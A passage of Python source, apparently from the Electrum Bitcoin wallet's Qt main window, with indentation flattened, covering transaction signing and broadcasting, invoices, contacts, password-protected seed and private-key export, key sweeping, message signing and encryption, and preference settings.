x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid bitcoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, list_header=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if list_header:
hbox = QHBoxLayout()
for b in list_header:
hbox.addWidget(b)
hbox.addStretch()
vbox.addLayout(hbox)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
return self.create_list_tab(l, l.get_list_header())
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_address(addr)
self.address_list.update()
self.history_list.update()
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except BaseException as e:
self.show_error(str(e))
return
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
self.gui_object.daemon.stop_wallet(wallet_path)
self.close()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It can not be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
from electrum.wallet import sweep_preparations
try:
self.do_clear()
coins, keypairs = sweep_preparations(get_pk(), self.network)
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(get_address())
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
except BaseException as e:
self.show_message(str(e))
return
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
try:
index = languages.keys().index(self.config.get("language",''))
except Exception:
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targetting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Time based'), _('Mempool based')])
fee_type_combo.setCurrentIndex(1 if self.config.use_mempool_fees() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==1)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
def on_dynfee(x):
self.config.set_key('dynamic_fees', x == Qt.Checked)
self.fee_slider.update()
dynfee_cb = QCheckBox(_('Use dynamic fees'))
dynfee_cb.setChecked(self.config.is_dynfee())
dynfee_cb.setToolTip(_("Use fees recommended by the server."))
fee_widgets.append((dynfee_cb, None))
dynfee_cb.stateChanged.connect(on_dynfee)
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
